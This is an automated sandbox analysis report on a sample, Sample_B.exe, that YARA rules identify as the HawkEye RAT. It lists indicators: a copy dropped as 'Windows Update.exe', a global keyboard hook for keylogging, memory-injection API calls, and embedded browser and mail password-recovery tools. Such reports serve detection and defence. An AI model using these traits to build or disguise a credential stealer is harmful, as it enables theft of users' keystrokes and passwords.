Source: Yara match File source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
Source: Yara match File source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
Source: Yara match File source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
Contains functionality to log keystrokes (.Net Source)
Source: Sample_B.exe, Form1.cs .Net Code: HookKeyboard
Source: Windows Update.exe.0.dr, Form1.cs .Net Code: HookKeyboard
Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs .Net Code: HookKeyboard
Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs .Net Code: HookKeyboard
Source: WindowsUpdate.exe.2.dr, Form1.cs .Net Code: HookKeyboard
Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs .Net Code: HookKeyboard
Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs .Net Code: HookKeyboard
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)
Source: Sample_B.exe, type: SAMPLE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: Sample_B.exe, type: SAMPLE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Sample_B.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\Desktop\Sample_B.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00646A6A NtResumeThread
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00645172 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00646B12 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00646AE5 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00645145 NtQuerySystemInformation
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BCD426
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BDD5AE
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BCD523
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BCD6C4
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BD7646
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C06AF4
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C2ABFC
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C23CBE
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C23C4D
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C23DC0
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BCED03
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00C23D2F
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BDAFA6
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BCCF92
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00551DB8
Source: C:\Users\user\Desktop\Sample_B.exe Code function: 0_2_00BFC7BC
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F103C0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EED426
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EFD5AE
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EED523
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EED6C4
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EF7646
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F229BE
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F26AF4
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F4ABFC
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F43CBE
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F43C4D
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F43DC0
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F43D2F
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EEED03
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EFAFA6
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00EECF92
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_001A638C
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_004E6068
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_004E7200
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_004E8A90
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_004E5778
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_004E8DE8
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 2_2_00F1C7BC
Source: C:\Users\user\Desktop\Sample_B.exe Code function: String function: 00C0BA9D appears 36 times
Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: String function: 00F2BA9D appears 36 times
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
Source: Sample_B.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Windows Update.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WindowsUpdate.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Sample_B.exe Binary or memory string: OriginalFilename vs Sample_B.exe
Source: Sample_B.exe Binary or memory string: OriginalFileName vs Sample_B.exe
Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Sample_B.exe
Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Sample_B.exe
Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameoleres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmploc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameACCTRES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLEACCRC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIPBusEnum.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerstrui.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameieinstal.exe.muiD vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmisvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRVSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedeskadp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePowerCPL.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsadp32.acm.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRV.SYS.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiccvid.drv.muiN vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebluetooth.cpl.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewpd_ci.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameINETRES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMFC42.DLL.MUIR vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSWPRV.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePhotoScreensaver.scr.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameATL.DLL.MUIR vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcbase.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelhdfrgui.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePDH.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSSCI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamescsiport.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVIFIL32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmci.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametermsrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBubblesj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIE4UINIT.EXE.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiedkcs32.dll.muiD vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWinMail.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewevtutil.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTBSSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameulib.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamei8042prt.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemycomput.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameparport.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedsound.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefwcfg.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameqwave.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameumrdp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewinsrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWinInit.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameservices.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelsasrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewship6.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshqos.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametzres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesppsvc.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameInput.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTipTsf.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSpTip.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTableTextService.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaero.msstyles.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskcomp.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamespoolsv.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBFE.DLL.MUIj% vs Sample_B.exe
